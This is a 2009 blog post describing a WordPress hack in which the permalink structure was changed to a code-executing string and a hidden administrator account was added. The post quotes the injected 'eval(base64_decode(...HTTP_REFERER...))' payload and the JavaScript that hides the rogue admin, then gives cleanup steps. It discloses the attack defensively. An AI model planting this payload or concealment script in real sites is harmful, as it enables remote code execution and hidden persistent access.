WordPress Code At The End Of URLs, Hack?

Posted by watashii | Filed under WordPress

permalink

http://blog.watashii.com/2009/09/05/wordpress-code-at-the-end-of-urls-hack/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Possibly a new WordPress hack happening at the moment?  Just got this weird code appended at the end of every URL on my WordPress blog.  This is due to the Permalink Settings being changed to a custom one.  To revert it back, simply go to your [Dashboard > Settings > Permalink], and revert the Custom Structure back to your original default option.

I’ve also noticed there is a few more users (a new Administrator and a bunch of Subscribers) being added by this hack [Dashboard > Users]. You may also notice the new administrator user is hidden from display.  What I did was to view the page source to pull their User ID.  Then edit this user to demote it to a subscriber (http://your_blog_url/wp-admin/user-edit.php?user_id=XXX), and rename their javascripted first name.  Thereafter deleted these extra subscribers.

Also I upgraded to the latest version WP 2.8.4 from 2.7.

Follow discussion here.

…         <div id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){     try{         var t=document.getElementById(“user_superuser”);         while(t.nodeName!=”TR”){             t=t.parentNode;         };         t.parentNode.removeChild(t);         var tags = document.getElementsByTagName(“H3″);         var s = ” shown below”;         for (var i = 0; i < tags.length; i++) {             var t=tags[i].innerHTML;             var h=tags[i];             if(t.indexOf(s)>0){                 s =(parseInt(t)-1)+s;                 h.removeChild(h.firstChild);                 t = document.createTextNode(s);                 h.appendChild(t);             }         }         var arr=document.getElementsByTagName(“ul”);         for(var i in arr) if(arr[i].className==”subsubsub”){             var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);             if(n[1]>0){                 var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator (“+(n[1]-1)+”)<”);         arr[i].innerHTML=txt;         }     }           }catch(e){};      };      addLoadEvent(setUserName); </script></div>

Tags: , ,

Read more | Comments (5) | September 4th, 2009